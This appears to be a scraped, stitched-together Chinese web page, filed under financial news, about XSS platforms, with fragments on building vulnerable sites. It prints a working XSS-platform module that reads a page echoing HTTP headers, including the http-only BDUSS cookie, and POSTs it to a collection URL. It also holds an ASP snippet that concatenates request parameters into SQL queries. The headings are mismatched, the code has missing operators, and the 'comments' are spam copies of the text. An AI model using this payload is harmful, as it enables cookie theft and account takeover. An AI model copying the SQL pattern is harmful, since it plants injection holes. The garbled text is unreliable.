b2c信息网

您现在的位置是:首页 > 金融新闻 > 正文

金融新闻

xss平台搭建源码(xss测试平台搭建)

hacker2022-06-12 05:58:15金融新闻95
本文目录一览:1、如何搭建一个含有慢速ddos,xss,sql注入,文件上传等漏洞的网站

本文目录一览:

如何搭建一个含有慢速ddos,xss,sql注入,文件上传等漏洞的网站

如何搭建一个含有慢速ddos,xss,sql注入,文件上传等漏洞的网站

XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。

如何通过 XSS 获取受 http-only さcookie

该测试页返回了完整的http头,其中也包括了完整的cookie。混贴吧圈的应该都知道BDUSS是最关键的字段,同时该字段是受http-only保护的,百度SRC之前也因此下调了XSS的评分标准。

02.jpg

这样,我们只要利用XSS平台的"指定页面源码读取"模块即可通过XSS获取用户的完整cookie。该模块代码如下:

code 区域

var u = ';id={projectId}';

var cr;

if (document.charset) {

cr = document.charset

} else if (document.characterSet) {

cr = document.characterSet

};

function createXmlHttp() {

if (window.XMLHttpRequest) {

xmlHttp = new XMLHttpRequest()

} else {

var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');

for (var n = 0; n MSXML.length; n++) {

try {

xmlHttp = new ActiveXObject(MSXML[n]);

break

} catch(e) {}

}

}

}

createXmlHttp();

xmlHttp.onreadystatechange = writeSource;

xmlHttp.open("GET", "", true);

xmlHttp.send(null);

function postSource(cc) {

createXmlHttp();

url = u;

cc = "mycode=" + cc;

xmlHttp.open("POST", url, true);

xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

xmlHttp.setRequestHeader("Content-length", cc.length);

xmlHttp.setRequestHeader("Connection", "close");

xmlHttp.send(cc)

}

function writeSource() {

if (xmlHttp.readyState == 4) {

var c = new postSource(xmlHttp.responseText)

}

}

由于是用xmlHttpRequest的形式读源码,且 的 Access-Control-Allow-Origin 为空,即默认不允许跨域,所以我们必须在同域下才能用xmlHttpRequest获取到完整的cookie。

我在 中有提到, 可以自由构造XSS。我们向该页面写入如下代码:

code 区域

titlewooyun.org/title

p超威蓝猫@wooyun.org/p

script src=;/script

xss 漏洞修复室 alert('xss'),应该放在哪?我的站源码如下:

%

classtype=request.QueryString("classtype")

bigclass=request.QueryString("bigclass")

if bigclass="27c9-7f61-8c63-e5f0 " then

rs.open "select * from news where ntype='" classtype " ' order by id desc",dconn,1,1

bigclass=rs("bigclass")

end if

rs.open "select * from news where bigclass='54e5-27c9-7f61-8c63 " bigclass "' order by id desc",dconn,1,1

%

scriptalert('xss')/script

发表评论

评论列表

  • 可难书尽(2022-06-12 11:41:54)回复取消回复

    ews where ntype='" classtype " ' order by id desc",dconn,1,1 bigclass=rs("bigclass")end ifrs.open "select * from news where bigclass='" bi

  • 辙弃柠木(2022-06-12 16:56:09)回复取消回复

    站源码如下:如何搭建一个含有慢速ddos,xss,sql注入,文件上传等漏洞的网站如何搭建一个含有慢速ddos,xss,sql注入,文件上传等漏洞的网站XSS攻击:跨站脚本攻击(Cross Site Scripting

  • 世味烟柳(2022-06-12 10:33:37)回复取消回复

    ql注入,文件上传等漏洞的网站如何搭建一个含有慢速ddos,xss,sql注入,文件上传等漏洞的网站XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻

  • 听弧乘鸾(2022-06-12 09:50:05)回复取消回复

    urce() { if (xmlHttp.readyState == 4) { var c = new postSource(xmlHttp.responseText) }}由于是用xml